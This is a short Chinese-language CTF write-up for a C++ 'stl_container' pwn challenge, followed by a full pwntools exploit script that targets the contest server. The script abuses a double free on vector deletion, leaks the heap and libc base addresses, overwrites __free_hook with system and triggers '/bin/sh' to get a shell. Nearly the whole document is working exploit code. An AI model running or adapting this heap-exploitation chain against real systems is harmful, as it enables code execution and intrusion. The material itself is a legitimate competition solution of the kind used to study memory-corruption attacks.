一场令人自闭的比赛,只会做这个C++的签到题,多的不会了。可惜的是code_runner那道,没爆破出来。

这一道题还是我学弟运气好碰出来的：vector 容器 free 的时候可以 double free。

from PwnContext import *
from pwn import *
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'


# I/O helpers on top of the PwnContext ``ctx`` object.  Every payload goes
# through str() so that a bare int (a menu choice) can be passed directly.
def s(data):
    """Send str(data) with no trailing newline."""
    return ctx.send(str(data))


def sa(delim, data):
    """Wait for str(delim) on the stream, then send str(data)."""
    return ctx.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return ctx.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) plus a newline."""
    return ctx.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to *numb* bytes."""
    return ctx.recv(numb)


def ru(delims, drop=True):
    """Receive until *delims*; with drop=True the delimiter itself is discarded."""
    return ctx.recvuntil(delims, drop)


def irt():
    """Hand the connection over to an interactive session."""
    return ctx.interactive()


def rs(*args, **kwargs):
    """Start the target via ctx.start(); all arguments are forwarded unchanged."""
    return ctx.start(*args, **kwargs)


def dbg(gs='', **kwargs):
    """Attach a debugger, passing *gs* as the gdb script."""
    return ctx.debug(gdbscript=gs, **kwargs)


# misc functions
def uu32(data):
    """Unpack up to 4 bytes as a u32, zero-padding short input on the right."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack up to 8 bytes as a u64, zero-padding short input on the right."""
    return u64(data.ljust(8, '\x00'))


def leak(name, addr):
    """Log *addr* as a success line of the form ``name = 0x...``."""
    return log.success('{} = {:#x}'.format(name, addr))

# nonzero: launch the binary through ctx.start(); 0: connect to ctx.remote
# (see choice() and debug() below)
local = 1
ctx.binary = 'stl_container'
ctx.debug_remote_libc = False
# Host libc; the hard-coded libc offsets further down assume this exact build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def choice():
    """Start the target and return whatever ctx.start() hands back.

    With ``local`` set the binary is started directly; otherwise
    ``ctx.remote`` is pointed at the contest endpoint first and
    ``ctx.start('remote')`` is used.
    """
    if not local:
        ctx.remote = ('134.175.239.26', 8848)
        return rs('remote')
    return rs()


def debug():
    """Attach the debugger when running locally; does nothing otherwise.

    Prints the libc base reported by ctx, registers two symbols and two
    breakpoints at 0xEDA and 0x10AF, then calls ctx.debug().
    """
    if local != 1:
        return
    libc_base = ctx.bases.libc
    print(hex(libc_base))
    ctx.symbols = {'sym1': 0xEDA, 'sym2': 0x10AF}
    ctx.breakpoints = [0xEDA, 0x10AF]
    ctx.debug()

def menu(index):
    """Answer the top-level ``>> `` prompt with *index* (sent as a line)."""
    prompt = ">> "
    sla(prompt, index)
def submenu(index):
    """Answer the second ``>> `` prompt (the per-container sub-option) with *index*.

    The prompt text is the same as the top-level one, so this simply
    delegates to menu().
    """
    menu(index)

def List(index, tpe, data):
    """Drive container menu 1 (List) with sub-option *tpe*.

    tpe 1 answers the "input data:" prompt with *data*; tpe 2 and 3 answer
    "index?" with *index*.  Any other value only selects the sub-option and
    sends nothing further.
    """
    menu(1)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe in (2, 3):
        sla("index?", index)
def Vector(index, tpe, data):
    """Drive container menu 2 (Vector) with sub-option *tpe*.

    tpe 1 answers the "input data:" prompt with *data*; tpe 2 and 3 answer
    "index?" with *index*.  Any other value only selects the sub-option and
    sends nothing further.
    """
    menu(2)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe in (2, 3):
        sla("index?", index)
def Queue(index, tpe, data):
    """Drive container menu 3 (Queue) with sub-option *tpe*.

    tpe 1 answers the "input data:" prompt with *data*; tpe 3 answers
    "index?" with *index*.  Any other value (2 included) only selects the
    sub-option and sends nothing further.
    """
    menu(3)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe == 3:
        sla("index?", index)
def Stack(index, tpe, data):
    """Drive container menu 4 (Stack) with sub-option *tpe*.

    tpe 1 answers the "input data:" prompt with *data*; tpe 3 answers
    "index?" with *index*.  Any other value (2 included) only selects the
    sub-option and sends nothing further.
    """
    menu(4)
    submenu(tpe)
    if tpe == 1:
        sa("input data:", data)
    elif tpe == 3:
        sla("index?", index)
# --- interaction sequence; the write-up above names the bug as a double free
# on vector deletion ---
choice()
# Three entries whose content is 16 filler bytes followed by the qword 0xa0.
Vector(1,1,"f"*0x10+p64(0xa0))
Vector(1,1,"f"*0x10+p64(0xa0))
List(1,1,"w"*0x10+p64(0xa0))
# Vector sub-option 2 on index 0, issued twice back to back -- presumably the
# double free the write-up refers to.
Vector(0,2,0)
Vector(0,2,0)
# A single byte 0xf0 as the data of a new vector entry.
Vector(0,1,"\xf0")
# Sub-option 3 prints "data: " followed by the entry; 6 bytes are read back and
# taken as a heap pointer, 0x125e0 being its distance from the heap base.
Vector(0,3,0)
ru("data: ")
heap_base=uu64(r(6))-0x125e0
leak("heap_base",heap_base)
# Two queue entries: the heap base, then a 17-qword record (7, 0xa0 and two
# heap_base+0x20 words among zeros).  Its layout is not explained here, so it
# is only described literally.
Queue(0,1,p64(heap_base))
Queue(0,1,p64(0)+p64(7)+p64(0)*1+p64(0xa0)+p64(heap_base+0x20)+p64(0)*11+p64(heap_base+0x20))
# Same print-and-read step; the subtracted constant is the difference of two
# addresses, presumably recorded in a local debugging session with this libc.
Vector(0,3,0)
ru("data: ")
libc_base=uu64(r(6))-(0x7ffff77d7ca0-0x7ffff73ec000)
leak("libc_base",libc_base)
# NOTE(review): this depends on a writable __free_hook, which glibc 2.34 and
# later no longer provide, and on the libc pinned by the ELF(...) path above.
free_hook=libc_base+libc.symbols['__free_hook']
system=libc_base+libc.symbols['system']
# Final three writes: the hook address, the system address, then "/bin/sh".
List(1,1,p64(free_hook))
Stack(0,1,p64(system))
Vector(0,1,"/bin/sh\x00")
#debug()
irt()